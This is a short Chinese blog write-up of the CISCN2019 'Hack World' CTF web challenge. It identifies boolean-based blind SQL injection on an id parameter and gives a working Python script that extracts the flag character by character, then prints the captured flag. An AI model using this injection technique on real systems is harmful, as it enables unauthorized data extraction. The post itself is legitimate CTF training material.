[CISCN2019 华北赛区 Day2 Web1]Hack World

最新推荐文章于 2024-09-24 14:53:54 发布

stantic

最新推荐文章于 2024-09-24 14:53:54 发布

阅读量160

点赞数

文章标签： php

本文链接：https://blog.youkuaiyun.com/stantic/article/details/124983739

版权

上来直接给表和列，还有一个id的参数，随便试一试

Hello, glzjin wants a girlfriend. 输入1时

Do you want to be my girlfriend? 输入2时

Error Occured When Fetch Result. 输入其他数字则是这个

bool(false) 输入字母则是这个

提示bool，显然是布尔盲注，有表有列，直接脚本

import requests
import time
url="http://9ce07c70-e1c0-4581-ae80-8161b67daf18.node4.buuoj.cn:81/index.php"
a=""
for i in range(1,50):
    for k in range(31,128):
        p='(select(ascii(mid(flag,{0},1))={1})from(flag))'.format(i,k)
        data={"id":p}
        u=requests.post(url=url,data=data)
        time.sleep(0.005)
        if"Hello" in u.text:
            a+=chr(k)
            print(a)
        else:
            continue
print(a)

用time.sleep来防止大量访问不接受

flag{b1e6b663-a85a-432f-a6aa-90e97c0c87f5}